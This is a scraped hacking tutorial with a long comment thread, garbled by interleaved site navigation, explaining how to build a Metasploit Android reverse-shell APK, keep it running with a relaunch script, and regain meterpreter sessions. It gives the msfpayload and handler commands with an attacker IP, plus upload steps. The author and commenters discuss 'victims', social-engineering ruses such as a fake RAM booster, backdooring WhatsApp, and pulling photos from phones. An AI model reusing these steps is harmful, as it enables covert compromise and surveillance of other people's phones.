How To Create A Persistent Back Door in Android Using Kali Linux - Null Byte - WonderHowTo

12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
FOLLOW US   
HOW TO
Create a Persistent Back Door in Android Using Kali Linux:

BY F.E.A.R.  09/08/2015 4:25 PM ANDROID
O R rather How to make the Backdoor Persistent:
Hello, my Cold and Merciless Hackers,

Welcome to my 5th Post,
In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.
I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable,
thanks to the raw syntaxes I found out from other sites.
Step 1
Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN, using a VM.
Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
Now, lets set-up a Listener:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
exploit
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...
Step 2
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 1/33
Create a Persistent Script: FOLLOW US   

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)
Move/Copy this to the Home/Root folder of KALI.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)
Step 3
Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:
cd /
Now you should be in the ROOT directory, you can check by typing:
ls
Now type:
cd etc
Check again by typing:
ls
Screen & Get Root (No Password Hacking

Required)
MAC FOR HACKERS
How to Get Your Mac Ready for Hacking

HOW TO HACK WI-FI
Get Anyone's Wi-Fi Password Without

Cracking Using Wifiphisher
Again change directory:

HOW TO
An Intro to Vim, the Unix Text Editor Every

cd init.d
Hacker Should Be Familiar With
ls
HOW TO
Buy the Best Wireless Network Adapter for

Wi-Fi Hacking in 2017
HOW TO
Create an Evil Access Point with MitmAP
THE HACKS OF MR. ROBOT
How to Use the Shodan API with Python to

Here we are...
Automate Scans for Vulnerable Devices
Time to Upload the Shell Script:

VIDEO Do this by typing:
How to Crack Weak Wi-Fi Passwords in
Seconds with Airgeddon
upload on Parrot OS
anything.sh
HACK LIKE A PRO
How to Crack Passwords, Part 1 (Principles

& Technologies)
 HOT  LATEST
HOW TO
Discover Computers Vulnerable to

EternalBlue & EternalRomance Zero-Days
HOW TO
Hack Android Using Kali (Remotely)
HOW TO
Set Up a Headless Raspberry Pi Hacking

Platform Running Kali Linux
HOW TO
Verify Your Downloads Haven't Been

Modified with a SHA-256 Hash
HACK LIKE A PRO
How to Crack Online Web Form Passwords

withWhat
THC-Hydra & Burp
the? No! WeSuite
need Root Access to complete this command! Darn!
Never-Mind:
HOW TO HACK WI-FI
Capturing WPA Passwords by Targeting

Users with just
> Lets a Fluxion
makeAttack
the application (i.e. Main Activity) persistent until Reboot
BUYER'S GUIDE
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
Top 20 Hacker Holiday Gifts for Christmas
> To do this upload the script anywhere in the sdcard:
2017
HOW TO
Install KalicdLive
/ on a USB Drive (With
cd /sdcard/Download
Persistence, Optional)
ls
upload anything.sh
E X P LO I T D E V E LO P M E N T
How to Learn Binary Exploitation with

Protostar
HOW TO
Hack Windows 7 (Become Admin)
ALL FEATURES 
HOW TO
4 Ways to Crack a Facebook Password &

© 2017 WonderHowTo, Inc
HOW TO
How to Protect
WONDERHOWTO
Yourself from Them
GADGET HACKS NEXT REALITY NULL BYTE
OS S
Easily Bypass macOS High Sierra's Login
Screen & Get Root (No Password Hacking
Required)
MAC FOR HACKERS
HowDone!
to GetUploaded!
Your Mac Ready for Hacking
HOW TO HACK WI-FI
Get Anyone's Wi-Fi Password Without Step 4

Cracking Using Wifiphisher
Execute the Script:
Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:
HOW TO

shell Be Familiar With
Hacker Should
HOW TO
Now, navigate to the location of the script:
Wi-Fi Hacking in 2017
HOW TO cd /
Create ancd
Evil/sdcard/Download
Access Point with MitmAP
ls
HowNow
to Use
itsthe Shodan
time API with Python
for EXECUTION. to
Type:
Automate Scans for Vulnerable Devices
sh anything.sh
VIDEO

Seconds with Airgeddon on Parrot OS
HACK LIKE A PRO
How to Crack Passwords, Part 1 (Principles

& Technologies)
 HOT  LATEST
HOW TO
Discover Computers Vulnerable to

EternalBlue & EternalRomance Zero-Days
The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
HOW TO
Hack Android Using Kali (Remotely)

Reboot to eliminate the script or use Task Killer
HOW TO
Set Up a Headless Raspberry Pi Hacking Step 5

Platform Running Kali Linux
HOW TO
Testing...
Verify Your Downloads Haven't Been
Modified with a SHA-256 Hash
You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
HACK LIKE A PRO
HowPROOF:
to Crack Online Web Form Passwords
with THC-Hydra & Burp Suite
HOW TO HACK WI-FI
Capturing WPA Passwords by Targeting

Users with a Fluxion Attack
BUYER'S GUIDE
Top 20 Hacker Holiday Gifts for Christmas

2017
HOW TO
Install Kali Live on a USB Drive (With

Persistence, Optional)
E X P LO I T D E V E LO P M E N T
Wow! It happened so Fast that 3 sessions got opened one after another.
How to Learn Binary Exploitation with
Protostar
(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical
HOW TO
problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )
Hack Windows 7 (Become Admin)
The END:
ALL FEATURES 
Yes! Finally a persistent backdoor has been created successfully for Android systems.
HOW TO
4 Ways to Crack a Facebook Password &

© 2017 WonderHowTo, Inc
HOW TO
How to Protect
WONDERHOWTO
Yourself from Them
GADGET HACKS NEXT REALITY NULL BYTE
OS S
Easily Bypass macOS High Sierra's Login
Things
Screen to Remember:
& Get Root (No Password Hacking
Required)
The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
If the Victim's Android system is Rooted and your Public IP is Static, then:
MAC FOR HACKERS

1)The Persistence will remain forever on WAN!
How to Get Your Mac Ready for Hacking
2)The Persistence will remain forever on LAN Obviously
HOW TO HACK WI-FI
Get Anyone's Wi-Fi Password Without

Good-Bye
Cracking Hackers!
Using Wifiphisher
Keep Coming For More!

I'll be waiting for Your Likes and Comments,
Thank You,
HOW TO

F.E.A.R.
Hacker Should Be Familiar With
HOW TO

Wi-FiRelated
Hacking in 2017
HOW TO
Create an Evil Access Point with MitmAP
HOW TO HACK LIKE A PRO HOW TO HOW TO

A
Install Metasploit on Android
How to Hack Smartphones (Creating a Build and Install Kali Nethunter (The New Hack Android Using Kali (Remotely)
How to Use the Shodan API with Python to Smartphone Pentesting Lab) Version) On a Supported Android Device
Automate Scans for Vulnerable Devices Running Android 6.0.1
VIDEO 200 Comments

Seconds with Airgeddon on Parrot OS
CIUFFY
2 YEARS AGO 1  
HACK LIKE A PRO
HowThis is so Passwords,
to Crack easy do deploy
Part with a little bit of Social Engineering, I gotta try this out.
1 (Principles
& Technologies)
I see you've been researching a lot to publish this, good job.
 REPLY
F.E.A.R.
Thank You! Ciuffy

Yes I had to do a lot of research to achieve it, with so many Fails.
But at last Success!
 REPLY
ANDREW VIGIL
6 MONTHS AGO -1 HIDDEN
SUDHARSAN VISWA
Great post F.E.A.R. Is there a way I can embed the meterpreter back door in to an apk file (game,launcher,,etc) ???
 REPLY
F.E.A.R.
Thank You! Sudharsan,
While creating a payload, what we do is embed a trojan/meterpreter in an apk file, which is then known as backdoor/trapdoor.
In other words, it is already embedded into the apk file, while the time of creation.
 REPLY
SUDHARSAN VISWA
Thank you for your response F.E.A.R. When the victim download's the app, the app seems useless and the victim uninstall the app.
If I can embed the backdoor in to a game or some other app, the backdoor will not be deleted. is there a way to embed the backdoor ?
 REPLY
WONDERHOWTO 2
F.E.A.R.
YEARS
GADGETAGO
HACKS NEXT REALITY NULL BYTE 2  
I don't think there is an easy way out for that, if you understand complicated ways follow this FOLLOW US   
Even if you do embed the code, you cannot make it persistent, because with the backdoor embedded, both, the app and the code will launch on the Android System
consistently.
Else, just try to convince the victim, that the app is meant to boost his Android, and it works in background. Show him/her the proof with a fake RAM scanner or a
normal RAM scanner application. (both would work)
 REPLY
RAPID
1 YEAR AGO 1  
did you find anyway of doing this? making it persistent on a original app?
 REPLY
MISTER INVISIBLE
10 MONTHS AGO - EDITED 10 MONTHS AGO 1  
Here: https://github.com/dana-at-cp/backdoor-apk/
https://github.com/dana-at-cp/backdoor-apk/
Exactly what you wanted, but as F.E.A.R says, whit persistence the app will open automatically and that wouldn't be stealthy. Although if you backdoor a popular app
like whatsapp and makw the victim install it, they will use it without sensing the diference while you get your backdoor. ;)
 REPLY
MARK MATSON
Dude thanks for this how to, but i have a problem with the script, when i execute the script remotely, its works, but send me many sessions of meterpreter, is so many
than i can't work is like an overflow of sessions. Do you know what happened? And thanks again for your work!
 REPLY
F.E.A.R.
Welcome! Mark,
Yes I know that there is an overflow of sessions even after terminating the shell, however the overflow should end when you get the meterpreter prompt. Maybe the
sleep command doesn't work, or try changing that to 2000 because the units maybe in milliseconds.
I'll try it too and update the script.
 REPLY
F.E.A.R.
Yes, found out a problem, Updating the script...Now...

The Units of the sleep command are in seconds.
 REPLY
MARK MATSON
Thanks dude!! i'll try. And last thing when i created the payload i have to put the LPORT line because, is wasn't work for me.
msfpayload android/meterpreter/reversetcp LHOST=182.68.42.6 LPORT=4444 R > /root/abcde.apk
 REPLY
F.E.A.R.
Port 4444 is the default port, so I hadn't put it there.
 REPLY
MARK MATSON
2 YEARS AGO - EDITED 2 YEARS AGO 1  
My mistake, now is working fine!!!! y put all this commands in a single line.
Now is fixed....
#!/bin/bash
while true
sleep 2000
done
Thanks for your amazing job! Really i enjoy your how to!!
 REPLY

1  
12/5/2017
F.E.A.R.
How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
1
2 YEARS AGO FOLLOW US   
Yes I know that, I already updated the script.
And You are Welcome! Mark (actually thanks to you!)
 REPLY
CRACKER|HACKER
Absolutely amazing! Well done! It's always more fun to write your own scripts. I can't wait fore more of your tutorials!
Just a suggestion: I wouldn't recommend putting your public IP out there, unless it is spoofed or hidden behind an anonymity service.
 REPLY
F.E.A.R.
Thank You! Cracker, (that means a LOT)

Actually those raw syntaxes helped me in writing it.
My Public IP is neither spoofed nor behind an anonymity service, however its dynamic and my firewall has all ports closed, plus it tells me about any network
information which is received or sent by my System. (custom firewall)
And that's why I have to turn all of my Firewalls off while I hack.(except router's of-course)
Still, I appreciate the suggestion.
 REPLY
BACK DOOR
Can we use NOIP for this?
 REPLY
F.E.A.R.
Hi again Back,
Yes, you can (those are not my words, because I haven't tried it yet.)
But I am confident it will work!
There is a slight change in making the payload:
msfpayload android/meterpreter/reverse_tcp_dns LHOST=hostname.no-ip.com R > /root/abcde.apk
 REPLY
BACK DOOR
Great i will try and let you know
 REPLY
F.E.A.R.
Darn it!
Sorry back, I tried, it only works on Windows,
msfpayload windows/meterpreter/reverse_tcp_dns LHOST=hostname.ddns.net X > /root/abcde.exe
 REPLY
RAFAEL OLIVEIRA
How i use this in windows? Someone knows? I need to use this in NO-IP, but in kali isnt working.
 REPLY
SAM DARKZZ
this payload is invalid!!

is there anyway to make sth like this?
 REPLY
H3X H3X
Can i download the pictures on the android phone using kali ? i mean get the pictures on that andoid user . is it possible ?
 REPLY

 
F.E.A.R.
2 YEARS AGO FOLLOW US 1  
Of-course!
Use download command
 REPLY
ZERBERO KHAN
Hi, first thank you for this. I'm having trouble with the script, it keeps me seding the message: Error: Uknown option: --user. What could be? I already try without the "--
user 0" option and it runs but does not do what have to do. Does this have to deal with the Android version? Any help would be appreciated.
 REPLY
F.E.A.R.
Hi and Welcome,
Really sorry about the (very) late reply, I actually missed this comment.
This is just an internal error, script is not wrong, tested on the Latest Android Version (5.0.2)
Reboot the android, or try it on another one.
 REPLY
JOSHUA DONCOUSE
Wait though can't we make a autorunscript that after it connects to the phone it runs cd /
cd sdcard
cd DCIM
upload persistant.sh
shell
cd /
cd /sdcard/DCIM
ls
sh persistant.sh
in that order? just a thought.
 REPLY
CRACKER|HACKER
Yes, you can. Just remember that if you are in a Meterpreter prompt, you will need to run the relative Meterpreter commands first.
 REPLY
F.E.A.R.
I actually tried it, on the day I posted this, but same thing happened in my comment below.
So I told him to try it out first.
But then I found a mistake too, I made the script to run as soon as the session starts. (And this resulted in overflow, unknown cmds, etc)
But your method seems fine, I though he needed a fully automatic. script.
My mistake.
EDIT: Thank You C|H
 REPLY
CT9
6 MONTHS AGO 1  
Hi, I managed to creat the autorunscript but can't get it to work completely:
to reate it just edit a autorun.rc file in root folder of kali and enter your commands there (one per line) then in msf console run :
set AutoRunScript multiconsolecommand -rc /root/autorun.rc

and it will autorun all those commands when exploit connects.
However putting the commands you mentionned like this won't work because it will not run sh persistent.sh inside the shell, what happens is that it uploads the sh
file successfully, then open the shell, and run "sh persistent.sh" in background inside the meterpreter terminal and not the android shell, and I don't know how to fix
this.
We need to put some command inside the autorunscript to start the shell with a specific command (sh /sdcard/persistent.sh) but no idea how
 REPLY
F.E.A.R.
Good Idea!
But, I think first try it, because maybe, meterpreter may not be able to handle so many commands, so fast, and it will result in unknown command error, so it's better
to execute it step by step,
{As I said, maybe, that doesn't mean you shouldn't try it.}
FOLLOW US  REPLY
 
JOSHUA DONCOUSE
ok can anyone make an autorunscript file that does this? I can make say run autorunscript <scriptname> and it just stays there. pretty much here's what it does after i
connect the metpreter
Session ID 1 (192.168.0.6:666 -> x.x.x.x:10067) processing AutoRunScript 'persist'

and nothing happens after that. my commands are what i commented earlier in a file called persist.
 REPLY
A.M
Just a great & very easy to understand tutorial :)
I was just wondering about what would happen if two or more users installed&opened the apk !
Would you be able to control both of them at the same time ?
 REPLY
F.E.A.R.
Thank You A.M,

If two or more users open the apk at the same time, two sessions will be created.
Yes we can control them both at the same time(however one will remain in the background until, we swap.
 REPLY
A.M
Sorry for the late reply as I was busy with somethings ^^'
I'd like to know the command to 'swap' between devices please & also wanted to know if there's a problem that might occur when the (.sh file) is put more than once
on the same device... for example:
-once in the root area & once at any other place
 REPLY
CRACKER|HACKER
If you are currently in a Meterpreter session, type background. Once you are back in the Metasploit command line, type sessions -i to view the sessions, and choose
by the session number, i.e. sessions -i 2.
 REPLY
A.M
Thanks, Cracker|Hacker
I'll wait for F.E.A.R's answer on my second question &

there's also a problem that I'm having whenever I type the command 'shell' i get this error message :
" Error running command shell: Errno::EADDRNOTAVAIL Cannot assign requested address - bind(2) for "127.0.0.1" port 0 "
Any idea on how to fix it ?
 REPLY
F.E.A.R.
Ans1: C|H answered perfectly!
Ans2: No there is no problem at all (your device should have root access to access the 'root area')
Ans3: Hm.. This error should not occur at this stage... "Address not available", the port is in use. Try changing the port and then exploit.
 REPLY
A.M
Sorry for my ignorance but... How to change the port exactly ?

Cuz I searched for it but got no results that would help ^^'
 REPLY
WONDERHOWTO
F.E.A.R.
2 YEARS
GADGET HACKSAGO
NEXT REALITY NULL BYTE 1  
While creating the payload, just put this after LHOST: FOLLOW US   
LPORT 8080 (or 80, or try the default one again 4444)
Use the same port, while setting up a listener.
 REPLY
A.M
Still same issue :(

Could this be related to that I'm using Kali on VirtualBox ?
 REPLY
CRACKER|HACKER
Knowing how VirtualBox works for others, probably.
 REPLY
A.M
Are there any solutions that I could try to fix this issue ?!
Cuz I can't install Kali outside the VirtualBox at the moment !
& Would installing another VM help ?
 REPLY
F.E.A.R.
Virtual Box?
I have never used it and never will.
Only trust VMware (12 I think) I also like way it allocates memory (RAM)
However the network settings are more complicated to configure but nevermind.
Also, I don't think this problem is because of virtual box but.. Its better to switch to VMware.
Try hacking another device, before switching.
 REPLY
A.M
Getting this problem when I execute the ".sh" file on LAN:
'Error: Unknown option: --user'

then many things are written under it like options & such things !
any idea for the this ?
 REPLY
STEVEN DOT EXE

meterpreter > cd init.d
stdapifschdir: Operation failed: 1
HELPPPPPPPPP
by the way, great tutorials, keep up the good work! :D
 REPLY
F.E.A.R.
Hi Steven,
Welcome to NullByte!
The device has to be rooted (have root access) to access that directory.
Thank You for the appreciation :)
 REPLY
MOJTABA GHANIDEL
what if target device is not rooted?
 REPLY
SHQIPERIA ETNIKE
Where I write the code msfpayload android/meterpreter/reversetcp LHOST=182.68.42.6 R > /root/abcde.apk the result is "Permission denied" how can I proced
 REPLY

 
1
 
OCCUPYTHEWEB
2 YEARS AGO FOLLOW US  
you must be the root user.
 REPLY
SHQIPERIA ETNIKE
How can I solve this problem
 REPLY
CRACKER|HACKER
Use sudo as the command prefix.
 REPLY
OCCUPYTHEWEB
Login as root.
 REPLY
PC 0MRADE
2 YEARS AGO - EDITED 2 YEARS AGO -1 HIDDEN
PC 0MRADE
Android 5.x.x have been giving out the parsing error usually associated with unchecking unchecking the allow installation from unknown sources check box. This is
causing my two most common RATS to be impossibly to install on devices. could it be that one like your self has a solution.
 REPLY
JESSICA THOMSON
you need to sign your apk. /Here it tells how
 REPLY
CHAITANYAKUMAR G
Hi, I just copied your bash script, in my rooted android 5.0.2 phone and when i execute it, it says, while unmatched. I tried addding ; after while and it gives different
error. Can someone please help ?
Chaitanya.
 REPLY
F.E.A.R.
Yes, I know, on Lollipop it has issues.

I have tried about 20 such scripts after modifying, but no luck, still trying, it will take time (TIME)
EDIT: Will update the script when, found one working
 REPLY
CHAITANYAKUMAR G
Ii just tried with the am command line only then there is different message.. moreover i think with android 5, i am able to connect to the android device(non rooted),
but not able to execute any reboot or shutdown commands. It should say access/permission denied, but it says unknown command. :(
 REPLY
0XYG3N
hello ,
i've done exactly what you said.. its working i have meterpreter shell .. but its like restricted access.. i cant go to /system/etc/init.d or even upload the .sh file to
/sdcard/Download directory.. this is the error i get.
and i cant even delete something..

its like restricted permissions.
 REPLY
DONGWON LEE
i created the .apk file and exploit/multi/handler

but i can't run .apk file in my cell phone
what should i do??
-info-
cell phone is LG Gpro2 and android version 4.4.2
this is error message " There is a problem parsing the package"
 REPLY
0XYG3N
2 YEARS AGO -1 HIDDEN
DONGWON LEE
no... i can't installed the ..apk file....

if i run the .apk file in my phone " There is a problem parsing the package" error message
 REPLY
JESSICA THOMSON
sign your apk just follow this
 REPLY
ITS HITMAN
hi there.!
how can i find the public ip of the android device connected to wifi, and i have no access to that device.
pls help me out.
 REPLY
F.E.A.R.
Google it using the default browser and android phone
 REPLY
ITS HITMAN
i don't have any access to that android device, at that instance how can i?
 REPLY
HARSHA
if target user has dynamic IP above method won't work.so any other way for dynamic ips?
 REPLY
KAMRAN BALOCH
I need Help :( . when sends the file to cell . file can't open after downloading (Sorry bad in English) help me please Thanks
 REPLY
ASCHI33
Hi,
I'm having the same problem as Suspéct.
I can perfectly navigate on the android filesystem, download images and stuff is also possible.
If i want to upload the script it produces an error like this:

- core-channel-open: Operation failed: 1
Is there a solution?
 REPLY
F.E.A.R.
Upload it only to sdcard.

 REPLY
ASCHI33
Thanks for the quick answer, sadly this produces the same error.
I tried to upload it to the sdcard, extsdcard and a few other places.
any idea what's going wrong?
 REPLY
F.E.A.R.
Recheck:
1) You have placed the script in the root folder of Kali
2) You have used the correct command:
3) upload xxx.sh
I this doesn't work then, it means your android is strict in security matters and hence you either have to root your android or try it on another one.
(Android exploitation is not in full support yet, its quite unstable)
 REPLY
B7ITZZ
The exploit doesn't seem to start up unless the user selects the MainActivity App again. Is there a way to run the app continuously in the background? I've tried the
suggested persistent back door but no luck.
 REPLY
TRYHARDER
Image via imgur.com
This is the .apk
 REPLY
TRYHARDER
If someone can reply me.. please do it :D FOLLOW US   

 REPLY
ENERGYWOLF
@tryharder I had the same problem. I solved it by manually signing the apk. This may work for you. Look at this link for how to sign the app manually
https://developer.android.com/tools/publishing/app-signing.html#signing-manually
Also, try installing adb with: apt-get install adb

And then install the apk with: adb install you_app.apk
(Note: your device must be connected to the computer for that to work, so nothing remote about that :p)
This step may not be necessary, but it's how I did it. So in case signing it doesn't work for you maybe try that last step too.
 REPLY
CASPERASS
Thank you so much F.E.A.R. I have a question: How can we make it persistent decompiling it with apktool? What do we need to add to AndroidManifes.xml or smali?
Most of the victims' phone probably won't be rooted. So after reboot our malicious apk will be useless. If we add required lines to the source can we make it persistent
permanently?
 REPLY
ZACHARIAH HAZELWOOD
Hey do you know if there is a command in meterpreter for android or a way to browse the sys files to get make and model of phone so i can change root
 REPLY
A.M
Getting this problem when I execute the ".sh" file on LAN:
'Error: Unknown option: --user'

then many things are written under it like options & such things !
 REPLY
F.E.A.R.
Yeah, script is unstable in lollipop.
 REPLY
A.M
my android version isn't lollipop!
 REPLY
F.E.A.R.
Sorry, missed your comment:

Then it should surely work.
Use other commands to run script: './anything.sh'
 REPLY
ARMAN BA
hi there !
i upload script on 2 device,one device was root but another not rooted.
but when i run script on both of them i get this error >>
: not found6: true
where is the problem?
 REPLY
F.E.A.R.
Yes I know,
Have been working on it for 3 weeks!
Found a solution, updating script...
 REPLY
ARMAN BA
thanks F.E.A.R
i found a solution and it's work for me.i write and explain exactly what i do.when i copy and paste your script in notpad it dos not working for me but when i write like
this it's work.
(sorry for my bad english)
1.in kali linux open terminal and write >> nano anything.sh << and than hit Enter key on keyboard.(this make a new .sh file)
2.on this windows you must write your script code or copy and past it.but i think it's better to writing the code
3.for saving this script you must hit Ctrl+x key together on your keyboard and than hit Y key and after that hit Enter key (it's don your file is saved)
 REPLY
F.E.A.R.
Thank You for the comment,

But I already updated the script.
As for the way you explain how to write the script I agree. You can follow any method both will work.
GO THROUGH. THE POST AGAIN AND READ THIS LINE:

CRITICAL: DO NOT...........WON'T WORK /!\
 REPLY
ANDRU SERBAN
Hello people , wich version of kaly you use ? Who is the last one with msfpayload ? and working ..?
FEAR , please tell me wich is the last tutorial avalible for reversetcp on android ? only one sesion ...to download some files...
Sorry for my bad english ..
 REPLY
F.E.A.R.
You can use any version of Kali,

If you get the msfpayload error, just use msfvenom.
Its here
 REPLY
PINKYFIRE
Hello F.E.A.R
first i wanna thanks for all of ur great tut :)
i've got so many question,
1.are the LPORT is important ?? i dont see u typin' it when u make the backdoor.apk
2.Since we know our target android phone is not rooted,are we have to place the shell script in the download folder ??
3.can this method works in iphone ??
4.im already make my own payload.apk.on my rooted android its not work :( but work at my other android.what happen with that ??
5.after i set my listener,and launch the Main Activity app on my other android (not rooted),the meterpreter start working,which makes me happy for a while,i take some
pic to try it with (webcamsnap) command,its work as well,and then about 10 minutes later ,my meterpreter wont work with reason : Died.what happen ??
Sorry for too much question,and sorry for my bad english because english not my main languange :"(
Hope u reply all of my question
Thanks
 REPLY
F.E.A.R.
2 YEARS AGO
FOLLOW US
2   
You are Welcome Rizky :)
1. My default LPORT is 4444 so there is no need to change it, until you are 'experimenting' over WAN, and have forwarded port other than 4444.
2. No don't do that, instead place it in a folder which is rarely explored or looked into. I did it as it is easily accessible from that folder.
3. Nope the method is for pure android systems.
4. Is the other phone in which the hack doesn't work is Mi ? It doesn't depend whether the android is rooted or not but it might depend on some systems.
5. Android meterpreter is very unstable, if you are getting 10min, you are really lucky. That is the reason why I made this persistence tutorial.
Follow it and you can have access to the android forever (provided the android doesn't reboot and you are on LAN)
No problem, I am always happy to help.
 REPLY
PINKYFIRE
hey..thanks for reply me so fast i didnt expect that :)
im just want to say my rooted android phone use some cyanogen-rom i downloaded from the internet,maybe that makes me cant install the generated apk :/
and im still got some question,
1.the phone i try to hack is my own phone (for experiment) and its connected to my LAN,my question is,it is possible to hack someone android that not connected to my
LAN ??
2.if im make the sh script and then launch the script,what will happen when target reboot his phone ??
3.what happen when target delete the installed apk ??
Thanks for ur help,i dont even know you but im already like you :D
thanks for helping me :)
 REPLY
F.E.A.R.
Use a file manager/ explorer, navigate to the directory of the generated apk and install from there. (Make sure you have deleted the previously installed apk)
1. Yes you can test the hack on WAN (outside LAN), you need to fulfill two requirements:
a) the port (4444) used , should be forwarded (give me details about your router and I'll explain port forwarding)
b) while creating the payload you need to replace your internal IP with external/public one. (Type on Google: what's my IP)
2. If the non rooted target reboots the phone then the persistence will end. (The script will terminate)
3. If the target deletes the apk then all is lost (session will end)
 REPLY
PINKYFIRE
oops,my bad
 REPLY
F.E.A.R.
Don't reveal your Public IP, ever to anyone (Even if I do)

Also I just want a Company name and Model no. of the router:
For eg: Netgear Router DGN1000 etc.
OR
You can search here on your own.
If it is of Realtek, does the interface matches:
(I am assuming that you know how to login to the router config page...)
 REPLY
SAAD SAAB
hello f.e.a.r
m new in kali linux, plz help me .... when i try to upload script.sh, it shows me an error:
core-channel-open: Operation failed: 1
& can u tell me how can i get root access..? as you've written above "We need Root Access to complete this command! Darn!"
sry 4 my bad English
 REPLY
F.E.A.R.
Hello Saad:
You don't need root access to execute the script, but to access the location you need root, so that the script is persistent even after reboot.
However if the device is not rooted, upload the script anywhere in sdcard, and follow the tutorial further. (The script will terminate after reboot :( )
 REPLY
SAAD SAAB
Hey F.E.A.R, Thank u very much for reply
i am uploading the script in Downloads folder of android device, but the same error :( i am trying this script with galaxy s3, when i want to upload with this command
"upload script.sh" it gives me "core-channel-open: Operation failed: 1"
 REPLY
F.E.A.R.
Can you get me a screenshot please?
 REPLY
SAAD SAAB
thanks again :)
 REPLY
F.E.A.R.
Oops, missed the comment,

Follow:
cd /
upload script.sh
shell
cd /
sh script.sh
(Just upload it to root directory)

EDIT: If there is still an error, just type ls after cd / (in meterpreter) and a screenshot again.

 REPLY
SAAD SAAB
2 YEARS AGO
FOLLOW US
2   
no prob bro thanks for your help :)
 REPLY
F.E.A.R.
There should be no errors at this stage, because the ls cmd works.

Is the application (partially) blocked through the anti-virus?
This specific error indicates that the application has been denied to upload the script.
Try the following:
Try and use the download command (to download something), if this doesn't work then the application has been surely blocked by AV.
Try to remove/delete a file using rm command.
Finally try this with another android.
And tell the results.
 REPLY
SAAD SAAB
i can download files from android device but can't upload.

oky i will try with another android device, thank you very much for your help & very nice tutorial :))
Image via fbcdn.net
 REPLY
TAREK ABD-ALLAH FARRAG

1 YEAR AGO - EDITED 1 YEAR AGO 1  
upload the script to the path you want in the phone

in your case this should be the following
upload root/script.sh /storage/emulated/legacy/Download
and go to the uploaded path and activate the shell
 REPLY
PINKYFIRE
hello F.E.A.R ,my router is realtek PCIe GBE Family Controller,i dont know what my router number model,im lost the package box,even in the link u provided to me,the
only realtek model listed just 1 and thats doesnt even match with my router,any advice ??
 REPLY
F.E.A.R.
2 YEARS AGO FOLLOW US 1  
 
You know how to access your Router's login page right? If not then google it. Once you are in, get me a screenshot =)
 REPLY
SAGATE
Hi F.E.A.R awesome tutorial, keep it up!! They are very interesting!!
Though, I have some problem and hope that you have the answers for that, just learning Kali Linux and its so much fun :)
I will send screenshot first and then write my problem.
Image via gyazo.com
1. Even though my phone is rooted and I have checked by typing in meterpreter, checkroot . It sais Device is rooted with a green plus sign next to it, but even though
i try to upload alltid.sh in cd /etc/init.d it sais Operation failed 1.
2. So I tried the other way by uploading the file to sdcard/Download and it worked, but then when I type. sh alltid.sh (when im in shell) i get the error on the
screenshot. I have tried typing your script both in leafpad and in terminal ( nano anything.sh, then typing the scrips code) still I get that error 2 and 3.
Samsung Galaxy s4 running CyanogenMod ROM not MIUI :P
Do you have any idea what the problem is?
Best whishes, Sagate :)
 REPLY
F.E.A.R.
Thank You Sagate! I appreciate it.
1) You need to drop into shell and type su for root access. (A tutorial containing this will be published soon)
2) Go through the tutorial again, I wrote:

" There is a 'space' between 'while' and ':' "
 REPLY
SAGATE
1. Ohh so I write shell and then type su, then upload alltid.sh in the init.d directory? Will try that when I get home.
2. My bad, I read there is no space, damn. Im sorry.
Also if you could learn us how to port forward as you stated earlier to hack with WAN.
Thanks F. E. A. R. For the reply, will try this when I get home :-)
 REPLY
F.E.A.R.
Reply with your router details.
 REPLY
SAGATE
I have a technicolor TG799TSvn v2
 REPLY
F.E.A.R.
Follow this guide to open the ports (4444 and 80)
Now test the hack, if it does not work, go to the firewall option of your router's config page and get me a screenshot (OR allow the ports through firewall if you know
how to.)
 REPLY
SAGATE
2 YEARS AGO - EDITED 2 YEARS AGO FOLLOW US 1  
 
Thank you, I will try that guide and I will try the hack and let you know :)
Btw, It worked! By going into shell and typing su. I was able to type sh alltid.sh and now it works, sessions gets automatic open when I enter meterpreter.
But I still wasnt able to understand how to upload alltid.sh into cd /etc/init.d and look forward to that tutorial but I have the other method in the meantime.
Thank you F.E.A.R :D
 REPLY
F.E.A.R.
It has already been published :D
 REPLY
PINKYFIRE
finally im figured out what my router model,its TP-LINK TD W8951ND

my new problem is,i dnt know my router password.im gonna back when im log on to the log in page
 REPLY
F.E.A.R.
